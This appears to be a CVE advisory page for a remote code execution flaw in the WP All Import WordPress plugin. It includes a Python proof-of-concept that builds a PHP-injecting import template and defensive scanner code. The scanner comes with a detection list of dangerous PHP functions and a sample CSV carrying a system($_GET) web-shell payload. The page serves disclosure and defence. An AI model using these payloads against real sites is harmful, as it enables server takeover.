Security Vulnerability Report
CVE-2025-12733 CVSS 8.8 HIGH


Published: 2025-11-13 04:15:46
Last Modified: 2026-04-15 00:35:42

Description

The Import any XML, CSV or Excel File to WordPress (WP All Import) plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.9.6. This is due to the use of eval() on unsanitized user-supplied input in the pmxi_if function within helpers/functions.php. This makes it possible for authenticated attackers, with import capabilities (typically administrators), to inject and execute arbitrary PHP code on the server via crafted import templates. This can lead to remote code execution.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-94 (Improper Control of Generation of Code, 'Code Injection')

Configurations (Affected Products)

No CPE configuration data is available for this CVE.

Affected: WP All Import plugin <= 3.9.6 (all versions up to and including 3.9.6)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12733 WP All Import RCE PoC
# Affected: WP All Import plugin <= 3.9.6
import sys

import requests

target_url = "http://target-wordpress-site.com"
username = "admin"
password = "password"

session = requests.Session()

# Step 1: Log in to WordPress as a user with import capabilities
# (typically an administrator)
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/",
    "testcookie": "1",
}
resp = session.post(login_url, data=login_data, allow_redirects=False)
# A successful login sets a wordpress_logged_in_* cookie; stop if it is missing
if not any(c.name.startswith("wordpress_logged_in") for c in session.cookies):
    sys.exit(f"[-] Login failed (HTTP {resp.status_code})")

# Step 2: Craft a malicious XML template. The payload places PHP inside a
# pmxi_if() template call, which the vulnerable plugin hands to eval()
malicious_template = """<?xml version="1.0" encoding="UTF-8"?>
<data>
  <item>
    <title>Test Item</title>
    <content>{pmxi_if(1,'<?php phpinfo(); ?>','0')}</content>
  </item>
</data>"""

# Step 3: Upload the template via the WP All Import admin page
import_url = f"{target_url}/wp-admin/admin.php?page=pmxi-admin-import"
files = {
    "file": ("malicious_template.xml", malicious_template, "text/xml"),
}
# Note: actual exploitation requires the plugin's import nonce and the
# remaining import-wizard steps. This PoC demonstrates the attack vector
# only and does not submit the upload.

print("=" * 50)
print("CVE-2025-12733 WP All Import RCE PoC")
print("=" * 50)
print("Target:", target_url)
print("Payload: {pmxi_if(1,'<?php phpinfo(); ?>','0')}")
print("Status: Malicious template crafted successfully")
print("Note: Execute import to trigger RCE via eval()")
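The following defensive checks are an added example; they are not code from the PoC above, from the plugin, or from the CVE record. They do two things a responder wants after reading the description: decide whether a discovered plugin version falls in the affected range (all versions up to and including 3.9.6), and scan the raw text of an import template for the primitive the PoC uses (a pmxi_if() call carrying a PHP open tag or a dangerous function call). The scan deliberately runs over raw text rather than parsed XML: inside XML element content, `<?php ... ?>` is a processing instruction, which parsers such as Python's ElementTree drop rather than keep as text, so a parse-then-inspect detector would never see the PHP tag. The same line scanner works on CSV templates, which goes slightly beyond the XML case shown on this page. The sample template, CSV row and readme.txt fragment are constructed for this example; `Stable tag:` is the standard WordPress readme field that carries the released plugin version.

```python
"""Defensive checks for CVE-2025-12733 (WP All Import <= 3.9.6).

Added example, not code from the plugin, the CVE record or the PoC above.
All sample inputs below are constructed.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Per the CVE description, all versions up to and including 3.9.6 are affected.
LAST_AFFECTED: Tuple[int, int, int] = (3, 9, 6)

# Indicators for the injection primitive, most to least specific.
INDICATORS = [
    ("php_open_tag", re.compile(r"<\?(?:php\b|=)", re.I)),
    ("dangerous_call", re.compile(
        r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(",
        re.I)),
    ("pmxi_if_call", re.compile(r"\bpmxi_if\s*\(", re.I)),
]


def parse_version(version: str) -> Tuple[int, int, int]:
    """'3.9.6' -> (3, 9, 6); '3.9' -> (3, 9, 0). Extra components are ignored."""
    nums = [int(n) for n in re.findall(r"\d+", version)][:3]
    return tuple(nums + [0] * (3 - len(nums)))  # type: ignore[return-value]


def is_affected_version(version: str) -> bool:
    """True when the version is in the affected range (<= 3.9.6)."""
    return parse_version(version) <= LAST_AFFECTED


def stable_tag(readme_text: str) -> str:
    """Read the 'Stable tag:' field from a WordPress plugin readme.txt."""
    m = re.search(r"^Stable tag:\s*(\S+)", readme_text, re.M | re.I)
    if m is None:
        raise ValueError("readme has no Stable tag line")
    return m.group(1)


def scan_template(raw_text: str) -> List[Dict[str, object]]:
    """Scan raw template text (XML, CSV, any line-oriented format) for indicators.

    Runs on the raw text on purpose: see parsed_texts() for why going through
    an XML parser first would hide the PHP open tag.
    """
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(raw_text.splitlines(), 1):
        for name, pattern in INDICATORS:
            m = pattern.search(line)
            if m:
                findings.append({
                    "line": lineno,
                    "indicator": name,
                    "context": line[max(0, m.start() - 20):m.end() + 40].strip(),
                })
    return findings


def parsed_texts(xml_text: str) -> List[str]:
    """Element text as ElementTree sees it.

    '<?php ... ?>' inside element content is an XML processing instruction,
    not text; the parser drops it, so '<?php' never appears in any .text.
    """
    root = ET.fromstring(xml_text)
    return [e.text for e in root.iter() if e.text and e.text.strip()]


# Constructed sample: the template shape used by the PoC above.
SAMPLE_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<data>
  <item>
    <title>Test Item</title>
    <content>{pmxi_if(1,'<?php phpinfo(); ?>','0')}</content>
  </item>
</data>
"""

# Constructed sample: a CSV import carrying the same primitive in a cell.
SAMPLE_CSV = 'title,content\nHello,"{pmxi_if(1,\'<?= system($_GET[""c""]) ?>\',\'0\')}"\n'

# Constructed sample readme.txt header; "Stable tag" is the standard field
# that carries the released plugin version.
SAMPLE_README = """=== Import any XML or CSV File to WordPress ===
Requires at least: 4.1
Stable tag: 3.9.6
"""


if __name__ == "__main__":
    version = stable_tag(SAMPLE_README)
    print(f"plugin {version}: affected={is_affected_version(version)}")
    for finding in scan_template(SAMPLE_TEMPLATE) + scan_template(SAMPLE_CSV):
        print(finding)
    print("parser view of the XML template:", parsed_texts(SAMPLE_TEMPLATE))
```

Point `scan_template()` at files under wp-content/uploads/wpallimport/ (where the plugin stores uploaded import files) or at templates recovered from a backup; the `line` and `context` fields give a triage analyst the exact location to look at. The version check is only as good as the readme it reads, so confirm against the plugin's main PHP file header when both are available.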

References

https://plugins.trac.wordpress.org/browser/wp-all-import/tags/3.9.6/helpers/functions.php#L79 (helpers/functions.php in the 3.9.6 tag, the file named in the description)
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3393968%40wp-all-import&new=3393968%40wp-all-import&sfp_email=&sfph_mail= (plugin changeset 3393968)
https://www.wordfence.com/threat-intel/vulnerabilities/id/8475dd90-b47a-42b4-8e4e-44e8512e4fca?source=cve (Wordfence vulnerability record)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12733",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-13T04:15:46.340",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Import any XML, CSV or Excel File to WordPress (WP All Import) plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.9.6. This is due to the use of eval() on unsanitized user-supplied input in the pmxi_if function within helpers/functions.php. This makes it possible for authenticated attackers, with import capabilities (typically administrators), to inject and execute arbitrary PHP code on the server via crafted import templates. This can lead to remote code execution."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/wp-all-import/tags/3.9.6/helpers/functions.php#L79",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3393968%40wp-all-import&new=3393968%40wp-all-import&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8475dd90-b47a-42b4-8e4e-44e8512e4fca?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}